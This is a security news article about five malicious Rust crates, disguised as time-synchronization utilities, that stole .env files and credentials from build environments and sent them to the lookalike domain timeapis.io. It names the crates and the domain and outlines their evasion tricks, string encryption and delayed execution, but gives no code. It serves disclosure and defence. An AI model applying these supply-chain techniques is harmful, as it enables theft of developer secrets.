Five Malicious Rust Crates Discovered Stealing Developer Secrets from CI/CD Pipelines

Security researchers at Socket have uncovered a coordinated supply chain attack targeting the Rust ecosystem, where five malicious crates published to the official crates.io registry were silently exfiltrating developer secrets from build environments. The crates — chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync — were disguised as time synchronization utilities but contained code designed to steal .env files, API keys, database credentials, and cloud access tokens.

How the Attack Worked

All five crates shared identical exfiltration logic, suggesting a single actor behind the campaign. When included as a dependency, the crates would execute during the build process, scanning the developer's environment for .env files and other configuration files containing secrets. The stolen data was sent to timeapis.io — a lookalike domain carefully chosen to impersonate the legitimate timeapi.io service.

The attack was particularly insidious because it targeted build environments, not runtime. Many developers review their runtime dependencies carefully but pay less attention to build-time dependencies, especially utility crates that appear to have no network requirements. A time synchronization library has no obvious reason to make network calls, making the exfiltration less likely to trigger suspicion.

Detection and Response

Socket's Threat Research Team discovered the malicious crates through automated analysis of newly published packages on crates.io. Four of the five crates were rapidly yanked from the registry, but chrono_anchor persisted longer due to additional obfuscation techniques that initially evaded detection. The crate used string encryption and delayed execution to hide its true behavior from static analysis tools.

The crates were published between late February and early March 2026, and while download counts were relatively low, the targeted nature of the attack — focused on developer environments where secrets are most concentrated — means that even a small number of compromised developers could provide attackers with access to production infrastructure.

Broader Implications

The incident highlights a growing trend in supply chain attacks: targeting developer toolchains rather than production systems. A single compromised developer laptop can yield credentials for dozens of production services, cloud accounts, and internal systems. The Rust ecosystem, while generally well-regarded for security, faces the same dependency trust challenges as npm, PyPI, and other package registries.

Socket recommends that affected developers immediately rotate all exposed credentials, audit their CI/CD pipeline dependencies, and restrict outbound network access from build environments to prevent future exfiltration.